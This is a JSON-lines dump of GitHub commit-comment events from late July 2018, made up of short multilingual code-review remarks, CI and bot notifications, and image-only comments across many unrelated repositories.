{"id":"8033705776","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873575,"position":47,"line":54,"path":"src/main/java/com/spockatone/spock/Main.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T09:50:38Z","updated_at":"2018-07-29T09:50:38Z","author_association":"COLLABORATOR","body":"сначала дао, потом сервисы, потом сервлеты"}},"created_at":"2018-07-29T09:50:38Z"}
{"id":"8033706894","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873577,"position":23,"line":23,"path":"src/main/java/com/spockatone/spock/dao/jdbc/JdbcBetDao.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T09:51:36Z","updated_at":"2018-07-29T09:51:36Z","author_association":"COLLABORATOR","body":"какое отношение это имеет к \"Add security\" ?"}},"created_at":"2018-07-29T09:51:36Z"}
{"id":"8033707270","type":"CommitCommentEvent","actor":{"login":"o01eg"},"repo":{"name":"o01eg/freeorion"},"payload":{"comment":{"id":29873578,"position":45,"line":1044,"path":"server/ServerFSM.cpp","commit_id":"f78cf71916910d975f038a6b0620bbc116731ce5","created_at":"2018-07-29T09:51:56Z","updated_at":"2018-07-29T09:51:56Z","author_association":"OWNER","body":"Added comment."}},"created_at":"2018-07-29T09:51:56Z"}
{"id":"8033707521","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873579,"position":29,"line":29,"path":"src/main/java/com/spockatone/spock/dao/jdbc/JdbcBetDao.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T09:52:10Z","updated_at":"2018-07-29T09:52:10Z","author_association":"COLLABORATOR","body":"time.toString? хуйня. setDate или setTimestamp. У нас дата в базе как варчат хранится?"}},"created_at":"2018-07-29T09:52:10Z"}
{"id":"8033707660","type":"CommitCommentEvent","actor":{"login":"AmanDragoon"},"repo":{"name":"datasciencemasters/go"},"payload":{"comment":{"id":29873580,"position":null,"line":null,"path":null,"commit_id":"d66b849e26b76a7b33432d20597cea8a786f4c5c","created_at":"2018-07-29T09:52:16Z","updated_at":"2018-07-29T09:52:16Z","author_association":"NONE","body":"I think u read my mindset ,a  hacker who wanna be a data scientist .:grinning:"}},"created_at":"2018-07-29T09:52:16Z"}
{"id":"8033708601","type":"CommitCommentEvent","actor":{"login":"Ronoon"},"repo":{"name":"dresden-elektronik/deconz-rest-plugin"},"payload":{"comment":{"id":29873581,"position":null,"line":null,"path":null,"commit_id":"b570bb4004a4c431ae609e171ee2c4371d7de0e7","created_at":"2018-07-29T09:53:06Z","updated_at":"2018-07-29T09:53:06Z","author_association":"NONE","body":"This is the official Zigbee Org download site for HA Profile where i got the information.\r\n\r\nhttps://www.zigbee.org/non-menu-pages/zigbee-home-automation-download/\r\n\r\nI got the idea from a response of a rollershutter device listed in DEConz as HA Light so i was investigating in the deconz-rest-plugin/general.xml because DEConz has wrong fields in use with the shutter device.\r\nbut the investigating itself is wrong, because at this time i have the …25 Version and i not be able to make an update to the …3x Version.\r\n\r\nthis is the Wireshark of the shutter device (actual it is a climax  SCM-1ZBS / Blaupunkt SCM-S1) :\r\n![image](https://user-images.githubusercontent.com/41126336/43364976-0cdb27f8-9325-11e8-8e4d-05e46bee97c5.png)\r\n"}},"created_at":"2018-07-29T09:53:06Z"}
{"id":"8033709083","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pytest-fixture-config-feedstock"},"payload":{"comment":{"id":29873582,"position":null,"line":null,"path":null,"commit_id":"6646af25fc62d014c405837451a7ba31d5de851a","created_at":"2018-07-29T09:53:31Z","updated_at":"2018-07-29T09:53:31Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jcfr was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-29T09:53:31Z"}
{"id":"8033709820","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873584,"position":5,"line":73,"path":"src/main/java/com/spockatone/spock/dao/jdbc/JdbcLotDao.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T09:54:11Z","updated_at":"2018-07-29T09:54:11Z","author_association":"COLLABORATOR","body":"https://stackoverflow.com/questions/6371638/slf4j-how-to-log-formatted-message-object-array-exception"}},"created_at":"2018-07-29T09:54:11Z"}
{"id":"8033710279","type":"CommitCommentEvent","actor":{"login":"matthiashamacher"},"repo":{"name":"creativetimofficial/get-shit-done"},"payload":{"comment":{"id":29873585,"position":null,"line":null,"path":null,"commit_id":"d796a22c00ce5d9a53da738cbe273dfadbe784a7","created_at":"2018-07-29T09:54:38Z","updated_at":"2018-07-29T09:54:38Z","author_association":"NONE","body":"For me this change fixes the Issue #10 "}},"created_at":"2018-07-29T09:54:38Z"}
{"id":"8033710297","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873586,"position":32,"line":32,"path":"src/main/java/com/spockatone/spock/dao/jdbc/JdbcUserDao.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T09:54:39Z","updated_at":"2018-07-29T09:54:39Z","author_association":"COLLABORATOR","body":"когда мы уже научимся писать логи без конкатенаций...."}},"created_at":"2018-07-29T09:54:39Z"}
{"id":"8033711511","type":"CommitCommentEvent","actor":{"login":"Levitanious"},"repo":{"name":"Levitanious/tempest-cms"},"payload":{"comment":{"id":29873593,"position":29,"line":284,"path":"main.py","commit_id":"b1381f80b4a2830540a4800f87c537c094a4f79f","created_at":"2018-07-29T09:55:41Z","updated_at":"2018-07-29T09:55:41Z","author_association":"OWNER","body":"> TL;DR - Do queries how you like, but there is always some long-term win-win in doing them _prutty_ too.\r\n\r\nNow, i'm not strictly a SQL grammar-communist, but there is some merit in being picky about your queries.\r\n```sql\r\nSELECT `guid`, `name` FROM `characters`\r\n```\r\nThe above one is quite cute on it's own too, really. And when the time comes for a bigger and more fucky query -- it will save you some hell lotta time one day, debugging and such."}},"created_at":"2018-07-29T09:55:41Z"}
{"id":"8033711698","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873594,"position":9,"line":9,"path":"src/main/java/com/spockatone/spock/service/BetService.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T09:55:50Z","updated_at":"2018-07-29T09:55:50Z","author_association":"COLLABORATOR","body":"статические поля, только если синглтон или сервис локатор"}},"created_at":"2018-07-29T09:55:50Z"}
{"id":"8033712147","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"ValidusOs/frameworks_base"},"payload":{"comment":{"id":29873598,"position":null,"line":null,"path":null,"commit_id":"293c3ad400b10d2de2c87bd3ad02b9328283e20d","created_at":"2018-07-29T09:56:11Z","updated_at":"2018-07-29T09:56:11Z","author_association":"MEMBER","body":"I is on vacation, I know nothing 😋"}},"created_at":"2018-07-29T09:56:11Z"}
{"id":"8033712918","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873599,"position":29,"line":29,"path":"src/main/java/com/spockatone/spock/service/BetService.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T09:56:53Z","updated_at":"2018-07-29T09:56:53Z","author_association":"COLLABORATOR","body":"опиши сценарий когда это возможно? \r\nЕсли это таки возможно может лучше использовать Optional? А то получается что мы на сервисе формируем месседж для отображения"}},"created_at":"2018-07-29T09:56:53Z"}
{"id":"8033713688","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pytest-shutil-feedstock"},"payload":{"comment":{"id":29873600,"position":null,"line":null,"path":null,"commit_id":"4198774ece99a6aa81ccf04e06102e0b25ce7df8","created_at":"2018-07-29T09:57:34Z","updated_at":"2018-07-29T09:57:34Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jcfr was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-29T09:57:34Z"}
{"id":"8033713791","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"PavelGor/spock"},"payload":{"comment":{"id":29873601,"position":34,"line":34,"path":"src/main/java/com/spockatone/spock/service/BetService.java","commit_id":"efad6a82faab04f6d8f7ad672d88a7a0fb70e54b","created_at":"2018-07-29T09:57:38Z","updated_at":"2018-07-29T09:57:38Z","author_association":"COLLABORATOR","body":"https://www.youtube.com/watch?v=GjKdgeilR_g"}},"created_at":"2018-07-29T09:57:38Z"}
{"id":"8034867214","type":"CommitCommentEvent","actor":{"login":"huochunpeng"},"repo":{"name":"huochunpeng/cli"},"payload":{"comment":{"id":29877972,"position":24,"line":22,"path":"lib/resources/content/babelrc.js","commit_id":"5415bd8a3b5c7c9bd34438016e9be10179f811ad","created_at":"2018-07-30T00:00:23Z","updated_at":"2018-07-30T00:00:23Z","author_association":"OWNER","body":"See #909"}},"created_at":"2018-07-30T00:00:23Z"}
{"id":"8034868889","type":"CommitCommentEvent","actor":{"login":"huochunpeng"},"repo":{"name":"huochunpeng/cli"},"payload":{"comment":{"id":29877976,"position":29,"line":21,"path":"lib/resources/content/babelrc.js","commit_id":"5415bd8a3b5c7c9bd34438016e9be10179f811ad","created_at":"2018-07-30T00:01:12Z","updated_at":"2018-07-30T00:01:12Z","author_association":"OWNER","body":"For webpack, use \"stage-1\" to replace hand-picked \"transform-class-properties\"."}},"created_at":"2018-07-30T00:01:12Z"}
{"id":"8034869973","type":"CommitCommentEvent","actor":{"login":"huochunpeng"},"repo":{"name":"huochunpeng/cli"},"payload":{"comment":{"id":29877981,"position":3,"line":3,"path":"lib/resources/src/main-webpack.js","commit_id":"5415bd8a3b5c7c9bd34438016e9be10179f811ad","created_at":"2018-07-30T00:01:56Z","updated_at":"2018-07-30T00:01:56Z","author_association":"OWNER","body":"aurelia-bootstrapper does load aurelia-polyfills. This line is unnecessary."}},"created_at":"2018-07-30T00:01:56Z"}
{"id":"8034870805","type":"CommitCommentEvent","actor":{"login":"ELanning"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29877983,"position":16,"line":16,"path":"components/help-box/component.jsx","commit_id":"1bce2dbccf6941c96c077782fe1d4afb0aa46b6b","created_at":"2018-07-30T00:02:27Z","updated_at":"2018-07-30T00:02:27Z","author_association":"NONE","body":"Consider using `children` instead of `text`, as this is essentially just a `div`.\r\n\r\nConsider also making this of `PropTypes.node`, as there's no reason to disallow plain text being passed in or just a number as far as I'm aware."}},"created_at":"2018-07-30T00:02:27Z"}
{"id":"8034872851","type":"CommitCommentEvent","actor":{"login":"granitepenguin"},"repo":{"name":"wwiv/wwiv"},"payload":{"comment":{"id":29877992,"position":null,"line":null,"path":null,"commit_id":"cdf1aba45cf231117d9026c366d7a27b1972c6eb","created_at":"2018-07-30T00:03:39Z","updated_at":"2018-07-30T00:03:39Z","author_association":"NONE","body":"We should add socat to the list of pre-reqs to check for"}},"created_at":"2018-07-30T00:03:39Z"}
{"id":"8034883672","type":"CommitCommentEvent","actor":{"login":"n18022"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29878034,"position":null,"line":null,"path":null,"commit_id":"b4feb87257461b1ab2e39b02f7adab37fdebab5a","created_at":"2018-07-30T00:11:04Z","updated_at":"2018-07-30T00:11:04Z","author_association":"OWNER","body":"何か代入すればエラーでないので、適当に代入しました。次から0を入力します。\r\n\r\n2018年7月29日 16:04 kinjo-icolle <notifications@github.com>:\r\n\r\n> 確認しました。動作面は問題ないですね。\r\n> コードの部分で気になった箇所を。\r\n>\r\n> sum_price(3行目にて定義)\r\n> これ、後続で代入する部分で金額を代入及び加算していっているので、初期化の時点では0を代入すべきと思います。\r\n> 結果として数値が入っているので問題ないですが、初期状態と後続でデータ型が異なってるのが気になりました。\r\n>\r\n> あと、オプション部分について、1回目かそれ以外かですが、相反する条件なので、僕なら52行目のifの代わりにelseを書きます。(\r\n> 49行目の条件に対するelse句)\r\n>\r\n> あとは58行目以降の「正しいオプションが入力されたかのチェック」ですが、38行目のメインメニューの選択と同様のコードで、\r\n> if get_option_menue in optionmenues:\r\n> とすればもっと簡潔に書けると思います。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18022/programming-term2/commit/b4feb87257461b1ab2e39b02f7adab37fdebab5a#commitcomment-29873021>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AldxpaEXpR_sLo2unht6_zggPdJZZHGWks5uLV6UgaJpZM4VlUPz>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-30T00:11:04Z"}
{"id":"8034887203","type":"CommitCommentEvent","actor":{"login":"n18022"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29878043,"position":null,"line":null,"path":null,"commit_id":"90d2b98bb7ac73b0202fa9ed0ad9bcece6e4f357","created_at":"2018-07-30T00:13:19Z","updated_at":"2018-07-30T00:13:19Z","author_association":"OWNER","body":"関数に定義するのですね。勘違いでした。現在の関数はdocstringを表示するだけと化しています\r\n\r\n2018年7月29日 16:50 kinjo-icolle <notifications@github.com>:\r\n\r\n> 確認しました。出題内容としてはadd,sub,mul,divという「関数」を定義する課題だったので、それに沿っていません。\r\n> また、関数\"*3*\"では特に何も処理していないようです。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18022/programming-term2/commit/90d2b98bb7ac73b0202fa9ed0ad9bcece6e4f357#commitcomment-29873231>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AldxpfY4R6YEpPNMApSHpCEH2nvLvYVeks5uLWktgaJpZM4VlVCi>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-30T00:13:19Z"}
{"id":"8034888569","type":"CommitCommentEvent","actor":{"login":"jakegoodwell"},"repo":{"name":"JERICHO7X57/bourne-again-a-z-2968"},"payload":{"comment":{"id":29878052,"position":null,"line":null,"path":null,"commit_id":"5a9506eddcd42c32f5bb1d6026681dff8a848e86","created_at":"2018-07-30T00:14:11Z","updated_at":"2018-07-30T00:14:11Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/40372584/43372171-ce6a1384-9352-11e8-89ef-78af43e8d7a0.png)\r\n"}},"created_at":"2018-07-30T00:14:11Z"}
{"id":"8034889374","type":"CommitCommentEvent","actor":{"login":"jakegoodwell"},"repo":{"name":"JERICHO7X57/bourne-again-a-z-2968"},"payload":{"comment":{"id":29878057,"position":null,"line":null,"path":null,"commit_id":"5a9506eddcd42c32f5bb1d6026681dff8a848e86","created_at":"2018-07-30T00:14:46Z","updated_at":"2018-07-30T00:14:46Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/40372584/43372178-e3221b14-9352-11e8-9f79-fbabe0ce55ef.png)\r\n"}},"created_at":"2018-07-30T00:14:46Z"}
{"id":"8034890072","type":"CommitCommentEvent","actor":{"login":"ELanning"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29878059,"position":5,"line":5,"path":"components/help-box/component.jsx","commit_id":"1bce2dbccf6941c96c077782fe1d4afb0aa46b6b","created_at":"2018-07-30T00:15:13Z","updated_at":"2018-07-30T00:15:13Z","author_association":"NONE","body":"Is the extra star at the front, eg `/**` for the doc generator?\r\n\r\nSmall nit, consider ending the sentence with a period."}},"created_at":"2018-07-30T00:15:13Z"}
{"id":"8034890366","type":"CommitCommentEvent","actor":{"login":"jakegoodwell"},"repo":{"name":"JERICHO7X57/bourne-again-a-z-2968"},"payload":{"comment":{"id":29878062,"position":null,"line":null,"path":null,"commit_id":"5a9506eddcd42c32f5bb1d6026681dff8a848e86","created_at":"2018-07-30T00:15:23Z","updated_at":"2018-07-30T00:15:23Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/40372584/43372186-f83ff8a4-9352-11e8-9035-78bde57d205d.png)\r\n"}},"created_at":"2018-07-30T00:15:23Z"}
{"id":"8034890935","type":"CommitCommentEvent","actor":{"login":"jakegoodwell"},"repo":{"name":"JERICHO7X57/bourne-again-a-z-2968"},"payload":{"comment":{"id":29878065,"position":null,"line":null,"path":null,"commit_id":"5a9506eddcd42c32f5bb1d6026681dff8a848e86","created_at":"2018-07-30T00:15:48Z","updated_at":"2018-07-30T00:15:48Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/40372584/43372192-07fee746-9353-11e8-874c-0729178b7103.png)\r\n"}},"created_at":"2018-07-30T00:15:48Z"}
{"id":"8034892004","type":"CommitCommentEvent","actor":{"login":"jakegoodwell"},"repo":{"name":"JERICHO7X57/bourne-again-a-z-2968"},"payload":{"comment":{"id":29878070,"position":null,"line":null,"path":null,"commit_id":"5a9506eddcd42c32f5bb1d6026681dff8a848e86","created_at":"2018-07-30T00:16:21Z","updated_at":"2018-07-30T00:16:21Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/40372584/43372200-1acc80fe-9353-11e8-8310-9cca924c93e4.png)\r\n"}},"created_at":"2018-07-30T00:16:21Z"}
{"id":"8034892105","type":"CommitCommentEvent","actor":{"login":"carlcs"},"repo":{"name":"craftcms/element-api"},"payload":{"comment":{"id":29878072,"position":null,"line":null,"path":null,"commit_id":"8b4960890fb8d0fc9e7d0e53b583dca38461a387","created_at":"2018-07-30T00:16:25Z","updated_at":"2018-07-30T00:16:25Z","author_association":"NONE","body":"This should say enabled in changelog."}},"created_at":"2018-07-30T00:16:25Z"}
{"id":"8034892574","type":"CommitCommentEvent","actor":{"login":"jakegoodwell"},"repo":{"name":"JERICHO7X57/bourne-again-a-z-2968"},"payload":{"comment":{"id":29878077,"position":null,"line":null,"path":null,"commit_id":"5a9506eddcd42c32f5bb1d6026681dff8a848e86","created_at":"2018-07-30T00:16:46Z","updated_at":"2018-07-30T00:16:46Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/40372584/43372203-2a4cd600-9353-11e8-88d6-3b4d1ec9fa93.png)\r\n"}},"created_at":"2018-07-30T00:16:46Z"}
{"id":"8034892719","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29878078,"position":null,"line":null,"path":null,"commit_id":"255ad9668bdd73631118de1f7858a7f515e7e6fb","created_at":"2018-07-30T00:16:52Z","updated_at":"2018-07-30T00:16:52Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 561](https://ci.hashicorp.engineering/viewLog.html?buildId=107549&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-30T00:16:52Z"}
{"id":"8034893132","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29878079,"position":null,"line":null,"path":null,"commit_id":"255ad9668bdd73631118de1f7858a7f515e7e6fb","created_at":"2018-07-30T00:17:10Z","updated_at":"2018-07-30T00:17:10Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 561](https://ci.hashicorp.engineering/viewLog.html?buildId=107549&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:18"}},"created_at":"2018-07-30T00:17:10Z"}
{"id":"8034895597","type":"CommitCommentEvent","actor":{"login":"dougwilson"},"repo":{"name":"niftylettuce/tsscmp"},"payload":{"comment":{"id":29878086,"position":null,"line":null,"path":null,"commit_id":"88af02dbc7fbc7f7453947f43a8aa62a149b2c91","created_at":"2018-07-30T00:18:45Z","updated_at":"2018-07-30T00:18:45Z","author_association":"NONE","body":"Can you edit the comment of this commit to not at-mention me? It will generate an email to be every time this commit gets touched forever, even in forks."}},"created_at":"2018-07-30T00:18:45Z"}
{"id":"8034897169","type":"CommitCommentEvent","actor":{"login":"niftylettuce"},"repo":{"name":"niftylettuce/tsscmp"},"payload":{"comment":{"id":29878096,"position":null,"line":null,"path":null,"commit_id":"88af02dbc7fbc7f7453947f43a8aa62a149b2c91","created_at":"2018-07-30T00:19:50Z","updated_at":"2018-07-30T00:19:50Z","author_association":"OWNER","body":"done @dougwilson "}},"created_at":"2018-07-30T00:19:50Z"}
{"id":"8034897779","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29878098,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-30T00:20:14Z","updated_at":"2018-07-30T00:20:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T00:20:14Z"}
{"id":"8034922857","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"TabbycatDebate/tabbycat"},"payload":{"comment":{"id":29878182,"position":7,"line":151,"path":"tabbycat/utils/tables.py","commit_id":"4bedcfc036ecc0e4cbd1ed01e053c23f2774c846","created_at":"2018-07-30T00:36:46Z","updated_at":"2018-07-30T00:36:46Z","author_association":"MEMBER","body":"I see, no, that's fine with me. Both options are strange in their own ways, I guess. I'm just wondering I was in hindsight misguided in abstracting the adjudicator type in `AdjudicatorAllocation` like that, to automatically figure out if the chair was a lone judge. But I guess we still use it in printed scoresheets."}},"created_at":"2018-07-30T00:36:46Z"}
{"id":"8034938013","type":"CommitCommentEvent","actor":{"login":"BWBama85"},"repo":{"name":"BWBama85/myhelpfulguides-pihole-blacklist"},"payload":{"comment":{"id":29878214,"position":null,"line":null,"path":null,"commit_id":"9e7661364f8db0ca695caba2a9e0cbae874d5f86","created_at":"2018-07-30T00:46:10Z","updated_at":"2018-07-30T00:46:10Z","author_association":"OWNER","body":"First two initial domains block video from playing on Forbes.com."}},"created_at":"2018-07-30T00:46:10Z"}
{"id":"8034947118","type":"CommitCommentEvent","actor":{"login":"ganjihyok"},"repo":{"name":"DevDivas/Reviews"},"payload":{"comment":{"id":29878239,"position":9,"line":9,"path":"client/src/components/avg_rating/avg_rating.jsx","commit_id":"7bfd8c37fba3cf01b0891221efd1a357a701f525","created_at":"2018-07-30T00:52:09Z","updated_at":"2018-07-30T00:52:09Z","author_association":"CONTRIBUTOR","body":"was going to refactor with destructuring on next PR!\r\n"}},"created_at":"2018-07-30T00:52:09Z"}
{"id":"8034951912","type":"CommitCommentEvent","actor":{"login":"halabjaee"},"repo":{"name":"halabjaee/bot"},"payload":{"comment":{"id":29878244,"position":4,"line":561,"path":"bot/tgland.lua","commit_id":"13b19db083f8f994aead9ccf24be9836263be559","created_at":"2018-07-30T00:55:14Z","updated_at":"2018-07-30T00:55:14Z","author_association":"OWNER","body":"152940590"}},"created_at":"2018-07-30T00:55:14Z"}
{"id":"8034953167","type":"CommitCommentEvent","actor":{"login":"almchung"},"repo":{"name":"processing/p5.js"},"payload":{"comment":{"id":29878247,"position":34,"line":818,"path":"lib/addons/p5.dom.js","commit_id":"9861416d4fb085cb891d5cd1a7be1070a68b2c20","created_at":"2018-07-30T00:56:04Z","updated_at":"2018-07-30T00:56:04Z","author_association":"CONTRIBUTOR","body":"@TanviKumar yes, let's add `color()` (or `p5color()`) method along with `value()`. \r\nUsing:\r\n`p5.prototype._colorMode = value.mode;`\r\n`p5.prototype._colorMaxes = value.maxes;`\r\n`var c = p5.prototype.color(this.elt.value);`\r\n`return c;`\r\nseems to get rid of the colorMode error."}},"created_at":"2018-07-30T00:56:04Z"}
{"id":"8034954303","type":"CommitCommentEvent","actor":{"login":"NieDzejkob"},"repo":{"name":"ISSOtm/gb-asm-tutorial"},"payload":{"comment":{"id":29878257,"position":73,"line":71,"path":"src/what_is_gb.html","commit_id":"b27034c3e5ad07935a84a7c0a45d7ab6dd21ff90","created_at":"2018-07-30T00:56:44Z","updated_at":"2018-07-30T00:56:44Z","author_association":"NONE","body":"Is this still relevant? I can't see any links like this."}},"created_at":"2018-07-30T00:56:44Z"}
{"id":"8034958033","type":"CommitCommentEvent","actor":{"login":"ganjihyok"},"repo":{"name":"DevDivas/Reviews"},"payload":{"comment":{"id":29878266,"position":12,"line":12,"path":"client/src/components/avg_rating/avg_rating.jsx","commit_id":"7bfd8c37fba3cf01b0891221efd1a357a701f525","created_at":"2018-07-30T00:58:59Z","updated_at":"2018-07-30T00:58:59Z","author_association":"CONTRIBUTOR","body":"good catch! ill refactor."}},"created_at":"2018-07-30T00:58:59Z"}
{"id":"8034966787","type":"CommitCommentEvent","actor":{"login":"ganjihyok"},"repo":{"name":"DevDivas/Reviews"},"payload":{"comment":{"id":29878290,"position":15,"line":31,"path":"client/src/components/search/search.jsx","commit_id":"7bfd8c37fba3cf01b0891221efd1a357a701f525","created_at":"2018-07-30T01:03:47Z","updated_at":"2018-07-30T01:03:47Z","author_association":"CONTRIBUTOR","body":"Don't know how to use refs yet. I will look for it!"}},"created_at":"2018-07-30T01:03:47Z"}
{"id":"8034967527","type":"CommitCommentEvent","actor":{"login":"Deku2k"},"repo":{"name":"Deku2k/Languages"},"payload":{"comment":{"id":29878291,"position":27,"line":27,"path":"br.lang.php","commit_id":"ab2861fb99c978c158a54a9160e38306ca29e292","created_at":"2018-07-30T01:04:14Z","updated_at":"2018-07-30T01:04:14Z","author_association":"OWNER","body":"I'm wrong is \"Total de Partidas\" in \"Total Matches\"."}},"created_at":"2018-07-30T01:04:14Z"}
{"id":"8034968190","type":"CommitCommentEvent","actor":{"login":"Deku2k"},"repo":{"name":"Deku2k/Languages"},"payload":{"comment":{"id":29878292,"position":28,"line":28,"path":"br.lang.php","commit_id":"ab2861fb99c978c158a54a9160e38306ca29e292","created_at":"2018-07-30T01:04:36Z","updated_at":"2018-07-30T01:04:36Z","author_association":"OWNER","body":"I'm wrong is \"Total de Pontuação\" in \"Total Score\"."}},"created_at":"2018-07-30T01:04:36Z"}
{"id":"8034969325","type":"CommitCommentEvent","actor":{"login":"0918nobita"},"repo":{"name":"0918nobita/Tsundoku"},"payload":{"comment":{"id":29878294,"position":null,"line":null,"path":null,"commit_id":"5ac638176f2f69c30cdc65bca1c4940be6b6d6dc","created_at":"2018-07-30T01:05:16Z","updated_at":"2018-07-30T01:05:16Z","author_association":"OWNER","body":"訂正：``Update README.m`` → ``Update README.md``"}},"created_at":"2018-07-30T01:05:16Z"}
{"id":"8034970641","type":"CommitCommentEvent","actor":{"login":"dineshsudula"},"repo":{"name":"dineshsudula/dinesh_sudula"},"payload":{"comment":{"id":29878303,"position":null,"line":null,"path":null,"commit_id":"9772d378d89a026f929230e453cc9994c11f4f62","created_at":"2018-07-30T01:06:02Z","updated_at":"2018-07-30T01:06:02Z","author_association":"OWNER","body":"this is my first post in public github"}},"created_at":"2018-07-30T01:06:02Z"}
{"id":"8034975293","type":"CommitCommentEvent","actor":{"login":"kaoding"},"repo":{"name":"ant-design/ant-design-pro"},"payload":{"comment":{"id":29878322,"position":null,"line":null,"path":null,"commit_id":"50c8ce3719c1be5c06ea09dc9bfaff2cfe7a7e4d","created_at":"2018-07-30T01:08:41Z","updated_at":"2018-07-30T01:08:41Z","author_association":"NONE","body":"刚下班吧。"}},"created_at":"2018-07-30T01:08:41Z"}
{"id":"8034975922","type":"CommitCommentEvent","actor":{"login":"RichardGarcia"},"repo":{"name":"root-systems/cobuy-atomic"},"payload":{"comment":{"id":29878326,"position":null,"line":null,"path":null,"commit_id":"ca222199b62dc30eda0d2d22233ace5d218d0ab8","created_at":"2018-07-30T01:09:03Z","updated_at":"2018-07-30T01:09:03Z","author_association":"COLLABORATOR","body":"Please don't merge it yet.. need to update the schema. Thanks!\r\n"}},"created_at":"2018-07-30T01:09:03Z"}
